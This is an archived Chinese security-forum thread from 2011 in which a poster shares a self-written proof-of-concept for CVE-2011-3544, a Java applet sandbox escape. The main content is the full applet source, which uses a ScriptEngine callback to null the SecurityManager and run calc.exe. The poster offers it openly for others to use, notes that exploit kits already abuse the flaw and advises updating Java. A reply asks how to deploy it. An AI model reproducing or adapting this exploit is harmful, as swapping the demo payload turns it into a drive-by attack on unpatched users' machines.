本论坛为只读模式,仅供查阅,不能注册新用户,不能发帖/回帖,有问题可发邮件 xikug.xp (^) gmail.com
查看: 4027|回复: 1

新鲜出炉 - CVE-2011-3544 POC [复制链接]

Rank: 1

发表于 2011-11-30 14:41:30 |显示全部楼层
老外发现的,详细描述看他的blog: http://schierlm.users.sourceforge.net/CVE-2011-3544.html

这个老外很有趣,把细节讲的这么详细了,却不肯给出POC,说怕被坏人利用 ~~~
大哥,真怕被坏人利用乃就不要讲的这么详细好不好啊~

自己构造了个POC,要的拿去玩,反正迟早要进metaspolit
  1. import java.applet.Applet;

  2. import javax.script.*;

  3. import javax.swing.JList;

  4. public class ScriptEngineExp extends Applet {

  5.        
  6.         private JList list;
  7.        
  8.     public void init() {

  9.         try {

  10.             ScriptEngine se = new ScriptEngineManager().getEngineByName("js");
  11.             
  12.             se.eval("var error = new Error(\"My error\");" +
  13.                             "this.toString = function(){ " +
  14.                             "java.lang.System.setSecurityManager(null);" +
  15.                             "java.lang.Runtime.getRuntime().exec(\"calc.exe\");" +
  16.                             "return \"exploit!\";};" +
  17.                             "error.message = this;");
  18.         
  19.             list = new JList(new Object[]{se.get("error")});
  20.             
  21.             this.add(list);

  22.         } catch (ScriptException ex) {

  23.             ex.printStackTrace();

  24.         }

  25.     }


  26. }
复制代码
windows xp sp2 + jre1.6.27测试通过

大家机子上有Java的,最好升级到最新版本,已经有exploit kit在用这个漏洞了

Rank: 1

发表于 2011-12-5 22:17:05 |显示全部楼层
你好 问一下怎么把这个包传上去呢
您需要登录后才可以回帖 登录 | 立即加入

Archiver|手机版|第8个男人 - 论坛为只读模式,仅供查阅

GMT+8, 2019-5-22 01:42 , Processed in 0.026660 second(s), 8 queries .

Design by pvo.cn

© 2011 Pvo Inc.

回顶部